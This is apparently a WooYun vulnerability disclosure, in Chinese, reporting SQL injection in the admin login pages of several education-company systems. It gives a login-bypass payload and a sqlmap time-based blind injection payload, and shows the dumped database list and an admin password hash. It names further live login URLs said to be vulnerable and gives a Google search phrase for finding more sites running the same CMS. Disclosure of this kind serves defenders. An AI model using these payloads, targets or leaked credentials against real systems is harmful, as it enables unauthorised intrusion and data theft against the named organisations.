WooYun.org

以一个网站为例吧：http://kaixue.izhikang.com/admin.php，某活动的管理系统。
延时盲注，用户名密码参数均未过滤。
账号：admin' or '1'='1
密码：随意

back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-
based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: username=admin' AND SLEEP(5) AND 'QLKl'='QLKl&password=pass
---
back-end DBMS: MySQL 5.0.11
available databases [3]:
[*] information_schema
[*] sspxy
[*] test
得到管理员密码Hash：
back-end DBMS: MySQL 5.0.11
Database: sspxy
Table: admin
[1 entry]
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| admin | fa3ab04300afa717d5eb237c56cb28e2 |
+----------+----------------------------------+
用相同的Payload测试了学而思其他的几个系统的登录页面，部分存在该漏洞。
CMS特征：Google关键字“为了防止被人破解密码，建议您经常更换您的登录密码。”
部分存在漏洞的系统：
http://zd.speiyou.com/admin/users/login
http://rxcs021.speiyou.cn/admin/users/login
http://zd.xueersi.com
账号：admin' or '1'='1
密码：随意
通用的系统
应该还有……